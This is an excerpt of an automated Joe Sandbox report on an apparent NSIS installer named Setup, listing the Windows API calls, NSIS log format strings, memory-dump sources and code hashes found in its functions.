                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                        • API String ID: 565278875-3368763019
                                                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010D8
• FillRect.USER32(00000000,?,00000000), ref: 004010ED
• DeleteObject.GDI32(?), ref: 004010F6
• CreateFontIndirectW.GDI32(?), ref: 0040110E
• SetBkMode.GDI32(00000000,00000001), ref: 0040112F
• SetTextColor.GDI32(00000000,000000FF), ref: 00401139
• SelectObject.GDI32(00000000,?), ref: 00401149
• DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
• SelectObject.GDI32(00000000,00000000), ref: 00401169
• DeleteObject.GDI32(?), ref: 0040116E
• EndPaint.USER32(?,?), ref: 00401177
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
• Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
• Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
• Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
APIs
• RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
• lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
• RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
• RegCloseKey.ADVAPI32(?), ref: 004029E4
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
• WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
• WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
• WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
• WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: lstrlen$CloseCreateValuewvsprintf
• String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
• API String ID: 1641139501-220328614
• Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
• Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
• Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
• Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
APIs
• CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
• GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
• WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
• lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
• WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
• String ID: @bG$RMDir: RemoveDirectory invalid input("")
• API String ID: 3734993849-3206598305
• Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
• Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
• Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
• Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                        Strings
                                                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID: created uninstaller: %d, "%s"
• API String ID: 3294113728-3145124454
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
• FreeLibrary.KERNEL32(?,?), ref: 004024C3
Strings
• `G, xrefs: 0040246E
• Error registering DLL: %s not found in %s, xrefs: 0040249A
• Error registering DLL: Could not load %s, xrefs: 004024DB
• Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Similarity
• API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
• String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
• API String ID: 1033533793-4193110038
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00403E10
• GetSysColor.USER32(00000000), ref: 00403E2C
• SetTextColor.GDI32(?,00000000), ref: 00403E38
• SetBkMode.GDI32(?,?), ref: 00403E44
• GetSysColor.USER32(?), ref: 00403E57
• SetBkColor.GDI32(?,?), ref: 00403E67
• DeleteObject.GDI32(?), ref: 00403E81
• CreateBrushIndirect.GDI32(?), ref: 00403E8B
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: command="%s", xrefs: 00402241
• Exec: success ("%s"), xrefs: 00402263
• Exec: failed createprocess ("%s"), xrefs: 004022C2
Similarity
• API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
• String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
• API String ID: 2014279497-3433828417
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
• GetMessagePos.USER32 ref: 0040489D
• ScreenToClient.USER32(?,?), ref: 004048B5
• SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                                                        • String ID: f
                                                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                        • MulDiv.KERNEL32(00065600,00000064,046024A0), ref: 00403295
                                                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                        Strings
                                                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • GlobalFree.KERNEL32(008B5F78), ref: 00402387
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                                                        • String ID: CanPoland$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                        • API String ID: 1459762280-4121858973
                                                                                                                                                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                        • GlobalFree.KERNEL32(008B5F78), ref: 00402387
                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0
• Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
• Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
APIs
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0
• Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
